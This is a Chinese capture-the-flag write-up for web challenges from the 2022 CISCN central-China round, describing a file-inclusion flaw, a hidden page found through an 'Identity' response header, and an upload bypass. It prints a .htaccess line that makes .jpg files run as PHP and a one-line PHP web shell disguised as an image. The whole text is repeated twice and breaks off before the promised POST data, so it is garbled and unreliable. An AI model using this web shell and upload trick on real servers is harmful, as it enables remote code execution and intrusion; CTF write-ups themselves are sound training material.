2022CISCN华中Web的漏洞如何被发现和利用?
- 内容介绍
- 文章标签
- 相关推荐
本文共计299个文字,预计阅读时间需要2分钟。
本次web有两个比较简单,三个比较困难,三道题总体共一个解法。FakeUpload1这个签到题,打开发现有个文件上传界面,但题目意思是假文件上传,上传一张jpg照片后,然后点击。
这次的web有两道比较简单,剩下三道难度比较大,三道题总共一个解。
这个签到题难度,打开发现有个文件上传界面,但是题目意思是假的文件上传,上传一张jpg照片然后点击发现有文件包含
接着目录扫描发现flag.php,修改文件包含点的filename=flag.php,burp抓包看到注释中的flag
访问主页抓包发现返回包中有Identity字段的值
然后将Identity字段加入请求包获得地址/A0therhlddenPaGe.php
访问改地址得到一个文件上传页面,上传一个jpg木马图片发现有文件包含,然后上传.htaccess文件将目录下jpg文件解析为php:
AddType application/x-httpd-php .jpg
可以代码执行,但是很多命令执行函数被ban了,而且一般的php一句话也会有被过滤掉,上传如下文件:123.jpg
<script language="php">eval($_POST['x']);</script>
上传后访问,使用readfile函数即可读取flag,POST提交数据如下:
本文共计299个文字,预计阅读时间需要2分钟。
本次web有两个比较简单,三个比较困难,三道题总体共一个解法。FakeUpload1这个签到题,打开发现有个文件上传界面,但题目意思是假文件上传,上传一张jpg照片后,然后点击。
这次的web有两道比较简单,剩下三道难度比较大,三道题总共一个解。
这个签到题难度,打开发现有个文件上传界面,但是题目意思是假的文件上传,上传一张jpg照片然后点击发现有文件包含
接着目录扫描发现flag.php,修改文件包含点的filename=flag.php,burp抓包看到注释中的flag
访问主页抓包发现返回包中有Identity字段的值
然后将Identity字段加入请求包获得地址/A0therhlddenPaGe.php
访问改地址得到一个文件上传页面,上传一个jpg木马图片发现有文件包含,然后上传.htaccess文件将目录下jpg文件解析为php:
AddType application/x-httpd-php .jpg
可以代码执行,但是很多命令执行函数被ban了,而且一般的php一句话也会有被过滤掉,上传如下文件:123.jpg
<script language="php">eval($_POST['x']);</script>
上传后访问,使用readfile函数即可读取flag,POST提交数据如下:

